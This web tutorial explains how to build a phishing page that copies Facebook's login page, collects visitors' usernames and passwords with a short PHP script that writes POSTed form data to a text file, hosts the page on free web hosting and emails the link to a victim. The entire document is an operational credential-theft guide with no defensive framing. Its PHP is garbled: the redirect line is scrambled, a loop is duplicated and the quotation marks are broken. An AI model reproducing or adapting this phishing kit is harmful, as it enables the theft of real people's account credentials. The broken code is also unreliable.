Phishing is a type of deceit used to acquire sensitive personal information such as login credentials, credit card numbers, account information, and other details. We've put together a basic phishing mechanism that hackers can employ to create fake Facebook login pages.
Learn more about how to hack a Facebook password here.
Phisher's the phoney Facebook login page
It will be extremely simple for you if you are familiar with HTML and PHP. Let's have a look at how easy it is to create a phoney login page and grab the password.
Here's what you'll require:
1) A web hosting account
Hundreds of websites provide free web hosting accounts, usually with 100MB of space and a subdomain. On any of them, you can create a free web hosting account with a Subdomain. The problem with free hosting is that they will ban you as soon as they find out you have hosted phisher. As a result, it's best to try it out on your own computer. You can find a plethora of instructions by searching for "How to host create a simple PHP website on Windows or Mac."
2) A fake login page
To make a fake Facebook login page, go to the Facebook login page, right-click on it, and select ‘view source' or ‘view page source.' A new window will open with the source code after that. Simply use ctrl+a to select all of the code and ctrl+c to copy it. Copy and paste this code into a notepad, and save it to your PC with the.html extension.
as an example, Facebook-login.html
3) A php code that writes data onto a text file
Simply copy and paste the PHP code below into a notepad. After that, save it to your desktop as a.php file. For instance, code.php
(‘Location: original login page');?php header
$handle = fopen(“passwords.txt”, “a”); foreach($ POST as $variable => $value); foreach($ POST as $variable => $value) fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “rn”); fwrite($handle, “rn”); fwrite($handle, “rn”); fwrite($handle, “rn”); fclose($handle); exit;?>
4) A text file to save hacked Facebook passwords
Simply save an empty text file on your desktop with the name password.txt.
Note that if you don't create a text file, the code.php command 'open will generate one for you.
- Creating phisher
On the desktop, we now have the three required files: Facebook-login.html, code.php, and password.txt.
The following step is to link (connect) the three files. as a result, they must be linked in the following order: Facebook-login.html >> code.php >> passwords.txt
Facebook-login.html, for example, must be able to connect with code.php, which must then communicate with passwords.txt.
- Linking Facebook-login.html and code.php
Simply open Facebook-login.html in a text editor and look for the ‘action' box (to search, press ctrl+F). You'll see something like this when you find the action field:
Page pretending to be a Facebook login
Save the file after replacing everything in red with code.php.
Code for a bogus login page
You've simply linked facebook-login.html and code.php together.
[ * ] There could be many action fields. Replacing with code.php is the same method.
- Linking code.php and passwords.txt
Passwords.txt has already related to code.php in the code above.
Simply open code.php in a text editor and change “original login page” with your phisher's Facebook login page in the second line, then save.
You just told code.php to open the passwords.txt file and send the victim to the original Facebook login page after he enters his credentials.
Now that everything is in place, the next step is to upload your newly generated phisher to a free web hosting server.
- Steps in hosting phisher
Log in to the free hosting account you just made.
To access the file manager, click the ‘file manager' button.
Now go to the directory for your subdomain. Simply click on your subdomain in the files view box to do so.
Simply create a new directory (folder) and name it after the phisher you made.
Step 3: Navigate to the desired directory you just established.
In this directory, place all three files: Facebook-login.html, code.php, and passwords.txt.
It's important to note that all three files must be in the same directory. Now copy the.html and.txt file addresses. This phisher should be sent to your Virtual-victim. Simply send the link (the address of the.html file) by email or other means.
Now, have your virtual victim login to your phoney Facebook login page, and the username and password will be saved in a text file called passwords.txt, which can be viewed at any time to view the username and password.
That’s it! you are done. enjoy!